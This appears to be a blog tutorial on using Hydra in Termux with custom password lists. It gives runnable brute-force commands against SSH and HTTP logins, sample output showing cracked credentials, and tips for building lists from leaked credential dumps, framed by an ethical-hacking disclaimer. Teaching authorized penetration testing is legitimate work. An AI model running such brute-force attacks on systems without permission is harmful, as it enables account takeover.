The first time I tried brute forcing a login with Hydra on Termux, I failed—miserably. I was using a generic password list I found online, thinking that would be enough. It wasn’t. After hours of watching meaningless attempts pile up on my screen, I realized what every aspiring ethical hacker eventually learns: the real power lies in Custom Password Lists.
I started building my own—from old password dumps, leaked credentials, even personal patterns I’d observed in clients’ systems during pentests. Suddenly, things clicked. The success rate skyrocketed. My brute force attacks weren’t just louder—they were smarter.
If you’re a student, dev, or curious tinkerer diving into ethical hacking, this guide is for you. I’ll show you exactly how to use Custom Password Lists with Hydra in Termux—step by step, no fluff, no gatekeeping. Ready to upgrade your hacking toolkit?
Let’s get into it.
Important Note: This tutorial is intended solely for ethical hacking and legal penetration testing purposes. Unauthorized access or testing of systems without permission is illegal and punishable by law. Always ensure you have explicit consent before conducting any tests.
Download my FREE Hydra Cheat Sheet Now!
What Makes a Good Custom Password List?
Not all wordlists are created equal. A powerful Custom Password List doesn’t just throw random guesses—it reflects patterns.
Here’s what makes a password list smart:
- Context-aware entries: If you’re testing an app for Pinoy users, include names, birthdays, and common keyboard patterns like
qwerty123
,iloveyou
,admin2025
. - Hybrid formats: Mix dictionary words with numbers, special characters, and casing.
- Short to long progression: Start with quick hits (6–8 characters) before going full 20-char chaos.
The goal? Prioritize likely over lengthy. Your list should aim to crack passwords fast, not brute force for hours.
· · ─ ·𖥸· ─ · ·
How to Create a Custom Password List from Scratch
There are many ways to build a custom list—but here’s the simplest approach right in Termux:
nano passwords.txt
Then type entries like:
password123
juan2025
admin!@#
letmein
iloveyou
Save and close with CTRL + X
, then Y
and Enter
.
Want to generate them programmatically? Use crunch
:
pkg install crunch
crunch 6 8 abc123 -o customlist.txt
This creates all combinations between 6–8 characters using abc123
. Dangerous power—use responsibly.
· · ─ ·𖥸· ─ · ·
Where to Store the Password List in Termux
Hydra needs access to the file—so keep it somewhere safe and accessible.
Example:
~/hydra-lists/passwords.txt
You can create that folder:
mkdir -p ~/hydra-lists
mv passwords.txt ~/hydra-lists/
Then when running Hydra:
hydra -l admin -P ~/hydra-lists/passwords.txt target.com http-get
Avoid storing wordlists in system folders or shared storage unless you’re 100% sure of permissions.
· · ─ ·𖥸· ─ · ·
Installing Hydra in Termux (The Right Way)
Before you can unleash Hydra with your Custom Password Lists, you need to get it running inside Termux properly. No shady scripts, no bloated installs—just a clean setup that works.
This part is quick, but it matters. A lot of students run into errors here because they skip steps or don’t install required dependencies. Let’s avoid that mess.
Follow the steps below to install Hydra cleanly and prep Termux for action.
Step 1: Installing Hydra in Termux
First, ensure Hydra is installed on your Termux system.
Update your Termux packages:
pkg update && pkg upgrade
Explanation: Keeping your Termux environment up to date ensures smooth installation and compatibility for tools like Hydra.
Install Hydra:
pkg install hydra
Explanation: This command installs Hydra, a tool used for brute-force attacks on login credentials, along with all its dependencies.
Output:
hydra is successfully installed.
Step 2: Creating or Acquiring Custom Password Lists
A password list is a file containing potential passwords. Customizing these password lists ensures that you’re targeting the most relevant potential passwords for the task at hand.
Creating a Custom Password List: You can create a text file with potential passwords. Use nano
to create your list in Termux:
nano custom_password_list.txt
Add passwords, each on a new line:
admin password123 letmein qwerty secretpass
Save the file by pressing CTRL+X
, then Y
, and Enter
.
Downloading Pre-made Password Lists: You can download widely used password lists from sources like SecLists. These lists provide a broad range of potential passwords for different scenarios.
Download the SecLists repository:
git clone https://github.com/danielmiessler/SecLists.git
Step 3: Using Custom Password Lists with Hydra
Once your password lists are ready, you can run Hydra attacks using them. The basic command structure for Hydra with a password list is:
hydra -l <username> -P <password_list> <protocol>://<target_ip>
For example, to use the username admin
and the custom list custom_password_list.txt
to brute-force an SSH login:
hydra -l admin -P custom_password_list.txt ssh://192.168.1.10
Explanation: This command tells Hydra to brute-force the SSH login for the admin
user on the server at 192.168.1.10
using the passwords in your custom password list.
Output:
Hydra v9.1 starting at 2024-10-05 17:30:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 0 login tries per task
[DATA] attacking ssh://192.168.1.10:22/
[22][ssh] host: 192.168.1.10 login: admin password: letmein
1 of 1 target successfully completed, 1 valid password found
Step 4: Using Multiple Usernames and Password Lists
If you want to try multiple usernames in combination with your custom password lists, Hydra allows you to specify a username list as well:
hydra -L usernames.txt -P custom_password_list.txt ssh://192.168.1.10
-L usernames.txt
: Specifies a file containing multiple usernames.-P custom_password_list.txt
: Specifies the custom password list.
Explanation: Hydra will try each username in usernames.txt
with every password from your custom password list to brute-force the SSH server.
Output:
[22][ssh] host: 192.168.1.10 login: root password: password123
[22][ssh] host: 192.168.1.10 login: admin password: letmein
Step 5: Enhancing Custom Password Lists
To improve your chances of success, refine your custom password lists with the following strategies:
Research Industry-Specific Passwords: Tailor your list to include common passwords in the targeted organization or industry.
Generate Password Variations: Use tools like Crunch in Termux to generate variations:
crunch 8 12 abcdef123 -o generated_passwords.txt
This creates passwords of length 8 to 12 using the characters a-z
, 0-9
, and saves them to generated_passwords.txt
.
Combine Lists: Merge common password lists with personalized or custom-generated lists to create hybrid attacks.
Troubleshooting Common Hydra Errors
Got stuck? You’re not alone. Here’s a quick fix-it table:
Error Message | Likely Cause | Fix |
---|---|---|
0 valid passwords found | Wrong list or bad syntax | Check if the username/password is valid manually |
Broken pipe or Connection reset | Too many threads or wrong service | Lower -t value, double-check protocol |
Hydra not found | Not installed correctly | pkg install hydra then retry |
Permission denied | List file location error | chmod 644 on the password file |
Tip: Run Hydra with -V
to see every attempt—it’s slower, but great for debugging.
· · ─ ·𖥸· ─ · ·
What to Do After a Successful Attack
Success? Great. But remember: the goal is learning—not leaking.
Here’s what to do next:
- Log it: Save the output somewhere (screenshots, notes, terminal logs).
- Report it: If you’re doing ethical hacking on a target you own or have permission to test, report the weak credentials.
- Improve it: Adjust your password list based on what worked.
This is where you start building intuition around real-world password behavior.
· · ─ ·𖥸· ─ · ·
Your Next Move in Ethical Hacking Starts Here
By now, you’ve seen how powerful Custom Password Lists can be when paired with Hydra on Termux. Whether you’re just starting out or already elbow-deep in cybersecurity tools, crafting your own wordlists isn’t just a flex—it’s a skill that sets you apart.
Every successful pentest, every cracked login, every “Aha!” moment starts with better tools and sharper techniques—and this is just the beginning.
If you found this guide helpful, stick around. I regularly share tutorials like this—no filler, just real-world tactics for devs, students, and ethical hackers building their skills from the command line up.
Subscribe to get more hands-on Termux hacks and FOSS-powered guides—delivered straight to your inbox.
Leave a Reply